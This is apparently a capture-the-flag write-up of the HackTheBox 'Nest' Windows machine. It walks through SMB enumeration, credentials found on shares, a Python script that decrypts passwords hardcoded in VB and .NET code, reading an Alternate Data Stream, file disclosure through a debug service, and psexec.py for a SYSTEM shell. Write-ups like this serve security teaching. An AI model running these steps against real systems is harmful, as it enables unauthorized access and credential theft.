# Nest

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Nest was a nice, easy-rated Windows machine created by [VbScrub](https://x.com/VBscrub)

The user steps included guest authentication, credential discovery on SMB shares, decryption of credentials in config files, and conversion of VB code to Python.  
The root steps involved reading from Alternate Data Streams on SMB and converting .NET code to Python.

## Initial enumeration

```console
opcode@debian$ sudo nmap -v -p- --min-rate 2000 10.10.10.178

Nmap scan report for 10.10.10.178
Host is up (0.13s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE
445/tcp  open  microsoft-ds
4386/tcp open  unknown
```

```console
opcode@debian$ sudo nmap -sC -sV -p 445,4386 -oN nest.nmap 10.10.10.178

Nmap scan report for 10.10.10.178
Host is up (0.16s latency).

PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds?
4386/tcp open  unknown
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: 
|     Reporting Service V1.2
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     Reporting Service V1.2
|     Unrecognised command
|   Help: 
|     Reporting Service V1.2
|     This service allows users to run queries against databases using the legacy HQK format
|     AVAILABLE COMMANDS ---
|     LIST
|     SETDIR <Directory_Name>
|     RUNQUERY <Query_ID>
|     DEBUG <Password>
|_    HELP <Command>
1 service unrecognized despite returning data.

Host script results:
|_clock-skew: -17m47s
| smb2-time: 
|   date: 2025-03-06T08:28:23
|_  start_date: 2025-03-06T08:20:20
| smb2-security-mode: 
|   210: 
|_    Message signing enabled but not required
```

It is a first; I've never seen a Windows machine with only those two ports exposed.  
Some reporting service is running on port 4386.

## SMB enumeration

I prefer to use [NetExec](https://github.com/Pennyw0rth/NetExec) for SMB enumeration:

```console
opcode@debian$ docker run -it --entrypoint=/bin/bash --rm --name netexec nxc:latest
```

Null sessions are disabled:

```console
root@4275a4f79862:~# nxc smb 10.10.10.178 -u '' -p '' --shares
SMB         10.10.10.178    445    HTB-NEST         [*] Windows 7 / Server 2008 R2 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
SMB         10.10.10.178    445    HTB-NEST         [+] HTB-NEST\: 
SMB         10.10.10.178    445    HTB-NEST         [-] Error enumerating shares: STATUS_ACCESS_DENIED
```

However, guest sessions are enabled:

```console
root@4275a4f79862:~# nxc smb 10.10.10.178 -u 'opcode' -p '' --shares
SMB         10.10.10.178    445    HTB-NEST         [*] Windows 7 / Server 2008 R2 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
SMB         10.10.10.178    445    HTB-NEST         [+] HTB-NEST\opcode: (Guest)
SMB         10.10.10.178    445    HTB-NEST         [*] Enumerated shares
SMB         10.10.10.178    445    HTB-NEST         Share           Permissions     Remark
SMB         10.10.10.178    445    HTB-NEST         -----           -----------     ------
SMB         10.10.10.178    445    HTB-NEST         ADMIN$                          Remote Admin
SMB         10.10.10.178    445    HTB-NEST         C$                              Default share
SMB         10.10.10.178    445    HTB-NEST         Data            READ            
SMB         10.10.10.178    445    HTB-NEST         IPC$                            Remote IPC
SMB         10.10.10.178    445    HTB-NEST         Secure$                         
SMB         10.10.10.178    445    HTB-NEST         Users           READ            
```

RID cycling:

```console
root@4275a4f79862:~# nxc smb 10.10.10.178 -u 'opcode' -p '' --rid-brute 10000
SMB         10.10.10.178    445    HTB-NEST         [*] Windows 7 / Server 2008 R2 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
SMB         10.10.10.178    445    HTB-NEST         [+] HTB-NEST\opcode: (Guest)
SMB         10.10.10.178    445    HTB-NEST         500: HTB-NEST\Administrator (SidTypeUser)
SMB         10.10.10.178    445    HTB-NEST         501: HTB-NEST\Guest (SidTypeUser)
SMB         10.10.10.178    445    HTB-NEST         513: HTB-NEST\None (SidTypeGroup)
SMB         10.10.10.178    445    HTB-NEST         1002: HTB-NEST\TempUser (SidTypeUser)
SMB         10.10.10.178    445    HTB-NEST         1004: HTB-NEST\C.Smith (SidTypeUser)
SMB         10.10.10.178    445    HTB-NEST         1005: HTB-NEST\Service_HQK (SidTypeUser)
```

[impacket](https://github.com/fortra/impacket)'s `smbclient.py` can be used to check the `Data` and `Users` share:

```console
opcode@debian$ smbclient.py opcode@10.10.10.178 -no-pass
Impacket v0.13.0.dev0+20241206.82610.e9a47ffc - Copyright Fortra, LLC and its affiliated companies 

Type help for list of commands
# use Users
# ls
drw-rw-rw-          0  Sat Jan 25 18:04:21 2020 .
drw-rw-rw-          0  Sat Jan 25 18:04:21 2020 ..
drw-rw-rw-          0  Wed Jul 21 14:47:04 2021 Administrator
drw-rw-rw-          0  Wed Jul 21 14:47:04 2021 C.Smith
drw-rw-rw-          0  Thu Aug  8 13:03:29 2019 L.Frost
drw-rw-rw-          0  Thu Aug  8 13:02:56 2019 R.Thompson
drw-rw-rw-          0  Wed Jul 21 14:47:15 2021 TempUser
```

None of those directories were accessible.  
In the `Data` share, only the `Shared` directory is accessible.

```console
# cd Shared
# ls
drw-rw-rw-          0  Wed Aug  7 15:07:51 2019 .
drw-rw-rw-          0  Wed Aug  7 15:07:51 2019 ..
drw-rw-rw-          0  Wed Jul 21 14:47:12 2021 Maintenance
drw-rw-rw-          0  Wed Jul 21 14:47:12 2021 Templates
# cd Maintenance
# get Maintenance Alerts.txt
# cd ../Templates/HR
# get Welcome Email.txt
```

I found a couple of plaintext files within:

```console
opcode@debian$ cat Maintenance\ Alerts.txt 
There is currently no scheduled maintenance work

opcode@debian$ cat Welcome\ Email.txt     
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location: 
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the 
IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019


Thank you
HR
```

With these credentials, more shares can be accessed:

```console
root@4275a4f79862:~# nxc smb 10.10.10.178 -u 'TempUser' -p 'welcome2019' --shares
SMB         10.10.10.178    445    HTB-NEST         [*] Windows 7 / Server 2008 R2 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
SMB         10.10.10.178    445    HTB-NEST         [+] HTB-NEST\TempUser:welcome2019 
SMB         10.10.10.178    445    HTB-NEST         [*] Enumerated shares
SMB         10.10.10.178    445    HTB-NEST         Share           Permissions     Remark
SMB         10.10.10.178    445    HTB-NEST         -----           -----------     ------
SMB         10.10.10.178    445    HTB-NEST         ADMIN$                          Remote Admin
SMB         10.10.10.178    445    HTB-NEST         C$                              Default share
SMB         10.10.10.178    445    HTB-NEST         Data            READ            
SMB         10.10.10.178    445    HTB-NEST         IPC$                            Remote IPC
SMB         10.10.10.178    445    HTB-NEST         Secure$         READ            
SMB         10.10.10.178    445    HTB-NEST         Users           READ            
```

```console
opcode@debian$ smbclient.py TempUser:welcome2019@10.10.10.178
Impacket v0.13.0.dev0+20241206.82610.e9a47ffc - Copyright Fortra, LLC and its affiliated companies 

Type help for list of commands
# use Users
# cd TempUser
# ls
drw-rw-rw-          0  Wed Jul 21 14:47:15 2021 .
drw-rw-rw-          0  Wed Jul 21 14:47:15 2021 ..
-rw-rw-rw-          0  Wed Jul 21 14:47:15 2021 New Text Document.txt
# get New Text Document.txt
```

It was empty.  
We cannot access any of the directories in `Secure$` either.  
On the other hand, the directories on `Data` share became accessible. I found some config files within:

```console
# use Data
# cd IT
# cd Configs
# ls
drw-rw-rw-          0  Wed Aug  7 18:59:34 2019 .
drw-rw-rw-          0  Wed Aug  7 18:59:34 2019 ..
drw-rw-rw-          0  Wed Jul 21 14:47:13 2021 Adobe
drw-rw-rw-          0  Wed Jul 21 14:47:04 2021 Atlas
drw-rw-rw-          0  Tue Aug  6 09:27:08 2019 DLink
drw-rw-rw-          0  Wed Aug  7 15:23:26 2019 Microsoft
drw-rw-rw-          0  Wed Jul 21 14:47:13 2021 NotepadPlusPlus
drw-rw-rw-          0  Wed Jul 21 14:47:05 2021 RU Scanner
drw-rw-rw-          0  Tue Aug  6 09:27:09 2019 Server Manager
```

The one inside `RU Scanner` seems useful:

```console
# cd RU Scanner
# ls
drw-rw-rw-          0  Wed Jul 21 14:47:05 2021 .
drw-rw-rw-          0  Wed Jul 21 14:47:05 2021 ..
-rw-rw-rw-        270  Wed Jul 21 14:47:14 2021 RU_config.xml
# get RU_config.xml
```

```console
opcode@debian$ cat RU_config.xml 
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>
```

It contains credentials, but the password is encrypted.  
Another hint comes from the config files inside `NotepadPlusPlus`:

```console
# cd NotepadPlusPlus
# mget *
[*] Downloading config.xml
[*] Downloading shortcuts.xml
```

```console
opcode@debian$ cat config.xml   
<?xml version="1.0" encoding="Windows-1252" ?>
<NotepadPlus>
    <GUIConfigs>
        <!-- 3 status : "large", "small" or "hide"-->
        <GUIConfig name="ToolBar" visible="yes">standard</GUIConfig>
[--SNIP--]
    </FindHistory>
    <History nbMaxFile="15" inSubMenu="no" customLength="-1">
        <File filename="C:\windows\System32\drivers\etc\hosts" />
        <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
        <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
    </History>
</NotepadPlus>
```

The `\\HTB-NEST\Users$\C.Smith\Desktop\todo.txt` is not accessible. However, `\\HTB-NEST\Secure$\IT\Carl\` was accessible.  
Not having read ACL over a directory does not mean it'd be the same for subdirectories or files within.

```console
opcode@debian$ smbclient.py TempUser:welcome2019@10.10.10.178
Impacket v0.13.0.dev0+20241206.82610.e9a47ffc - Copyright Fortra, LLC and its affiliated companies 

Type help for list of commands
# use Secure$
# cd IT/Carl
# ls
drw-rw-rw-          0  Wed Jul 21 14:47:13 2021 .
drw-rw-rw-          0  Wed Jul 21 14:47:13 2021 ..
drw-rw-rw-          0  Wed Jul 21 14:47:13 2021 Docs
drw-rw-rw-          0  Tue Aug  6 09:45:47 2019 Reports
drw-rw-rw-          0  Tue Aug  6 10:41:55 2019 VB Projects
```

There are a bunch of files within. I switched to `smbclient` since the `mget` implementation in `smbclient.py` is not reliable enough:

```console
opcode@debian$ smbclient //10.10.10.178/Secure$ -U 'TempUser%welcome2019'
Try "help" to get a list of possible commands.
smb: \> cd IT/Carl
smb: \IT\Carl\> recurse ON
smb: \IT\Carl\> prompt OFF
smb: \IT\Carl\> mget *
```

```console
opcode@debian$ lsd --tree
 .
├──  Docs
│   ├──  ip.txt
│   └──  mmc.txt
├──  Reports
└──  'VB Projects'
    ├──  Production
    └──  WIP
        └──  RU
            ├──  RUScanner
            │   ├──  bin
            │   │   ├──  Debug
            │   │   └──  Release
            │   ├──  ConfigFile.vb
            │   ├──  Module1.vb
            │   ├──  'My Project'
            │   │   ├──  Application.Designer.vb
            │   │   ├──  Application.myapp
            │   │   ├──  AssemblyInfo.vb
            │   │   ├──  Resources.Designer.vb
            │   │   ├──  Resources.resx
            │   │   ├──  Settings.Designer.vb
            │   │   └──  Settings.settings
            │   ├──  obj
            │   │   └──  x86
            │   ├──  'RU Scanner.vbproj'
            │   ├──  'RU Scanner.vbproj.user'
            │   ├──  SsoIntegration.vb
            │   └──  Utils.vb
            └──  RUScanner.sln
```

## Converting VB code to Python

I looked inside the files:

```console
opcode@debian$ cd VB\ Projects/WIP/RU/RUScanner
opcode@debian$ cat Module1.vb
```

```vbnet
Module Module1

    Sub Main()
        Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
        Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)}

    End Sub

End Module
```

```console
opcode@debian$ cat Utils.vb
```

```cs
Imports System.Text
Imports System.Security.Cryptography
Public Class Utils

    Public Shared Function GetLogFilePath() As String
        Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt")
    End Function


    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function EncryptString(PlainString As String) As String
        If String.IsNullOrEmpty(PlainString) Then
            Return String.Empty
        Else
            Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function Encrypt(ByVal plainText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                    ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                           As String

        Dim initVectorBytes As Byte() = Encoding.ASCII.GetBytes(initVector)
        Dim saltValueBytes As Byte() = Encoding.ASCII.GetBytes(saltValue)
        Dim plainTextBytes As Byte() = Encoding.ASCII.GetBytes(plainText)
        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                           saltValueBytes, _
                                           passwordIterations)
        Dim keyBytes As Byte() = password.GetBytes(CInt(keySize / 8))
        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC
        Dim encryptor As ICryptoTransform = symmetricKey.CreateEncryptor(keyBytes, initVectorBytes)
        Using memoryStream As New IO.MemoryStream()
            Using cryptoStream As New CryptoStream(memoryStream, _
                                            encryptor, _
                                            CryptoStreamMode.Write)
                cryptoStream.Write(plainTextBytes, 0, plainTextBytes.Length)
                cryptoStream.FlushFinalBlock()
                Dim cipherTextBytes As Byte() = memoryStream.ToArray()
                memoryStream.Close()
                cryptoStream.Close()
                Return Convert.ToBase64String(cipherTextBytes)
            End Using
        End Using
    End Function

    Public Shared Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                    ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                           As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                           saltValueBytes, _
                                           passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                            0, _
                                            decryptedByteCount)

        Return plainText
    End Function


End Class
```

I asked ChatGPT for an equivalent implementation of the `DecryptString` function in Python, and it complied: [decrypt.py](decrypt.py)

```py
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
from Crypto.Util.Padding import unpad
import base64

def decrypt_string(encrypted_string):
    if not encrypted_string:
        return ""

    return decrypt(encrypted_string, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)

def decrypt(cipher_text, pass_phrase, salt_value, password_iterations, init_vector, key_size):
    init_vector_bytes = init_vector.encode('ascii')
    salt_value_bytes = salt_value.encode('ascii')
    cipher_text_bytes = base64.b64decode(cipher_text)
    key_bytes = PBKDF2(pass_phrase, salt_value_bytes, dkLen=key_size // 8, count=password_iterations)

    cipher = AES.new(key_bytes, AES.MODE_CBC, init_vector_bytes)
    decrypted_bytes = cipher.decrypt(cipher_text_bytes)
    plain_text_bytes = unpad(decrypted_bytes, AES.block_size)
    plain_text = plain_text_bytes.decode('ascii')

    return plain_text

encrypted_string = "fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE="
decrypted_string = decrypt_string(encrypted_string)
print(decrypted_string)
```

Running the script decrypts the password successfully:

```console
opcode@debian$ python3 decrypt.py
xRxRxPANCAK3SxRxRx
```

It is valid on SMB:

```console
root@4275a4f79862:~# nxc smb 10.10.10.178 -u 'C.Smith' -p 'xRxRxPANCAK3SxRxRx' --shares
SMB         10.10.10.178    445    HTB-NEST         [*] Windows 7 / Server 2008 R2 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
SMB         10.10.10.178    445    HTB-NEST         [+] HTB-NEST\C.Smith:xRxRxPANCAK3SxRxRx
SMB         10.10.10.178    445    HTB-NEST         [*] Enumerated shares
SMB         10.10.10.178    445    HTB-NEST         Share           Permissions     Remark
SMB         10.10.10.178    445    HTB-NEST         -----           -----------     ------
SMB         10.10.10.178    445    HTB-NEST         ADMIN$                          Remote Admin
SMB         10.10.10.178    445    HTB-NEST         C$                              Default share
SMB         10.10.10.178    445    HTB-NEST         Data            READ        
SMB         10.10.10.178    445    HTB-NEST         IPC$                            Remote IPC
SMB         10.10.10.178    445    HTB-NEST         Secure$         READ        
SMB         10.10.10.178    445    HTB-NEST         Users           READ        
```

## Reading Alternate Data Stream over SMB

Let's check out the `Users` share:

```console
opcode@debian$ smbclient //10.10.10.178/Users -U 'C.Smith%xRxRxPANCAK3SxRxRx'
Try "help" to get a list of possible commands.
smb: \> cd C.Smith\
smb: \C.Smith\> recurse ON
smb: \C.Smith\> prompt OFF
smb: \C.Smith\> ls
  .                                   D        0  Sun Jan 26 02:21:44 2020
  ..                                  D        0  Sun Jan 26 02:21:44 2020
  HQK Reporting                       D        0  Thu Aug  8 19:06:17 2019
  user.txt                            A       34  Thu Mar  6 03:20:57 2025

\C.Smith\HQK Reporting
  .                                   D        0  Thu Aug  8 19:06:17 2019
  ..                                  D        0  Thu Aug  8 19:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 08:18:42 2019
  Debug Mode Password.txt             A        0  Thu Aug  8 19:08:17 2019
  HQK_Config_Backup.xml               A      249  Thu Aug  8 19:09:05 2019
c
\C.Smith\HQK Reporting\AD Integration Module
d  .                                   D        0  Fri Aug  9 08:18:42 2019
  ..                                  D        0  Fri Aug  9 08:18:42 2019
  HqkLdap.exe                         A    17408  Wed Aug  7 19:41:16 2019

        5242623 blocks of size 4096. 1839518 blocks available
smb: \C.Smith\> mget *
```

```console
opcode@debian$ cat HQK_Config_Backup.xml    
<?xml version="1.0"?>
<ServiceSettings xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>4386</Port>
  <QueryDirectory>C:\Program Files\HQK\ALL QUERIES</QueryDirectory>
</ServiceSettings>
```

HQK Reporting should be the application running on port 4386.  
The file `Debug Mode Password.txt` was empty. However, it has an Alternate Data Streams (ADS):

```console
smb: \C.Smith\> cd "HQK Reporting"\
smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    Thu Aug  8 07:06:12 PM 2019 EDT
access_time:    Thu Aug  8 07:06:12 PM 2019 EDT
write_time:     Thu Aug  8 07:08:17 PM 2019 EDT
change_time:    Wed Jul 21 02:47:12 PM 2021 EDT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
```

We can attempt to read the stream:

```console
smb: \C.Smith\HQK Reporting\> get "Debug Mode Password.txt:Password"
```

```console
opcode@debian$ cat Debug\ Mode\ Password.txt:Password 
WBQ201953D8w 
```

And finally, the executable:

```console
opcode@debian$ file HqkLdap.exe
HqkLdap.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 4 sections
```

It is a .NET application, and [dotPeek](https://www.jetbrains.com/decompiler/) can be used for reverse engineering.  
I looked at the source code and learnt it is not the application running on port 4386.

## Interacting with the reporting service on port 4386

When `nc` is used to interact with the service, it gets hung up after any input.  
However, it works with `telnet`. The reason for this odd behavior is how they send a line break.  
`nc` sends LF (`\n`) on linux, while `telnet` sends CRLF (`\r\n`).  
The application only considers CRLF as a line break.

```console
opcode@debian$ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
```

After playing around with this application, I learnt that `SETDIR` lets us switch to any directory on the filesystem, and `LIST` returns the list of files within the current directory:

```console
>setdir C:\

Current directory set to C:
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  $Recycle.Bin
[DIR]  Boot
[DIR]  Documents and Settings
[DIR]  PerfLogs
[DIR]  Program Files
[DIR]  Program Files (x86)
[DIR]  ProgramData
[DIR]  Recovery
[DIR]  Shares
[DIR]  System Volume Information
[DIR]  Users
[DIR]  Windows
[1]   bootmgr
[2]   BOOTSECT.BAK
[3]   pagefile.sys
[4]   restartsvc.bat

Current Directory: C:
```

I checked everything inside `C:\Users\`, but it was not helpful.  
The DEBUG option, when used with the correct password, adds some additional options to the application:

```console
>debug WBQ201953D8w

Debug mode enabled. Use the HELP command to view additional commands that are now available
>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>
```

`SERVICE` and `SESSION` give us the install path of HQK:

```console
>service

--- HQK REPORTING SERVER INFO ---

Version: 1.2.0.0
Server Hostname: HTB-NEST
Server Process: "C:\Program Files\HQK\HqkSvc.exe"
Server Running As: Service_HQK
Initial Query Directory: C:\Program Files\HQK\ALL QUERIES

>session

--- Session Information ---

Session ID: a2d7a1ae-ce90-4304-b4bb-e95936768004
Debug: True
Started At: 3/7/2025 9:42:57 AM
Server Endpoint: 10.10.10.178:4386
Client Endpoint: 10.10.16.42:46296
Current Query Directory: C:\Program Files\HQK\
```

The `SHOWQUERY` command allows arbitrary file disclosure. For example:

```console
>setdir C:\Shares\Data\IT\Configs\RU Scanner

Current directory set to RU Scanner
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[1]   RU_config.xml

Current Directory: RU Scanner
>showquery 1

<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>
```

Therefore, we can look inside the HQK install directory:

```console
>setdir C:\Program Files\HQK\

Current directory set to HQK
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]   HqkSvc.exe
[2]   HqkSvc.InstallState
[3]   HQK_Config.xml

Current Directory: HQK
>showquery 3

<?xml version="1.0"?>
<ServiceSettings xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>4386</Port>
  <DebugPassword>WBQ201953D8w</DebugPassword>
  <QueryDirectory>C:\Program Files\HQK\ALL QUERIES</QueryDirectory>
</ServiceSettings>
```

The debug password was already known.

```console
>setdir C:\Program Files\HQK\LDAP

Current directory set to LDAP
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[1]   HqkLdap.exe
[2]   Ldap.conf

Current Directory: LDAP
>getquery 2

Unrecognised command
>showquery 2

Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
```

It contains encrypted Administrator credentials.  
When I used [dotPeek](https://www.jetbrains.com/decompiler/) on `HqkLdap.exe`, the class `CR` in the `HqkLdap` namespace seemed to be responsible for encryption:

```cs
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

#nullable disable
namespace HqkLdap
{
  public class CR
  {
    private const string K = "667912";
    private const string I = "1L1SA61493DRV53Z";
    private const string SA = "1313Rf99";

    public static string DS(string EncryptedString)
    {
      return string.IsNullOrEmpty(EncryptedString) ? string.Empty : CR.RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256);
    }

    public static string ES(string PlainString)
    {
      return string.IsNullOrEmpty(PlainString) ? string.Empty : CR.RE(PlainString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256);
    }

    private static string RE(
      string plainText,
      string passPhrase,
      string saltValue,
      int passwordIterations,
      string initVector,
      int keySize)
    {
      byte[] bytes1 = Encoding.ASCII.GetBytes(initVector);
      byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue);
      byte[] bytes3 = Encoding.ASCII.GetBytes(plainText);
      byte[] bytes4 = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations).GetBytes(checked ((int) Math.Round(unchecked ((double) keySize / 8.0))));
      AesCryptoServiceProvider cryptoServiceProvider = new AesCryptoServiceProvider();
      cryptoServiceProvider.Mode = CipherMode.CBC;
      ICryptoTransform encryptor = cryptoServiceProvider.CreateEncryptor(bytes4, bytes1);
      using (MemoryStream memoryStream = new MemoryStream())
      {
        using (CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, encryptor, CryptoStreamMode.Write))
        {
          cryptoStream.Write(bytes3, 0, bytes3.Length);
          cryptoStream.FlushFinalBlock();
          byte[] array = memoryStream.ToArray();
          memoryStream.Close();
          cryptoStream.Close();
          return Convert.ToBase64String(array);
        }
      }
    }
  }
}
```

The code is similar to the VB Project.  
I reused [decrypt.py](decrypt.py) and changed the values of ciphertext, passphrase, IV, salt and password iterations:

```py
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
from Crypto.Util.Padding import unpad
import base64

def decrypt_string(encrypted_string):
    if not encrypted_string:
        return ""

    # return decrypt(encrypted_string, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
    return decrypt(encrypted_string, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256)

def decrypt(cipher_text, pass_phrase, salt_value, password_iterations, init_vector, key_size):
    init_vector_bytes = init_vector.encode('ascii')
    salt_value_bytes = salt_value.encode('ascii')
    cipher_text_bytes = base64.b64decode(cipher_text)
    key_bytes = PBKDF2(pass_phrase, salt_value_bytes, dkLen=key_size // 8, count=password_iterations)

    cipher = AES.new(key_bytes, AES.MODE_CBC, init_vector_bytes)
    decrypted_bytes = cipher.decrypt(cipher_text_bytes)
    plain_text_bytes = unpad(decrypted_bytes, AES.block_size)
    plain_text = plain_text_bytes.decode('ascii')

    return plain_text

# encrypted_string = "fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE="
encrypted_string = "yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4="
decrypted_string = decrypt_string(encrypted_string)
print(decrypted_string)
```

Running it yielded the Administrator's password:

```console
opcode@debian$ python3 decrypt.py
XtH4nkS4Pl4y1nGX
```

The Administrator credentials can be used with `psexec.py` to obtain a shell:

```console
opcode@debian$ psexec.py Administrator:XtH4nkS4Pl4y1nGX@10.10.10.178
Impacket v0.13.0.dev0+20241206.82610.e9a47ffc - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 10.10.10.178.....
[*] Found writable share ADMIN$
[*] Uploading file PXSaqbHS.exe
[*] Opening SVCManager on 10.10.10.178.....
[*] Creating service MWPL on 10.10.10.178.....
[*] Starting service MWPL.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
HTB-NEST
```
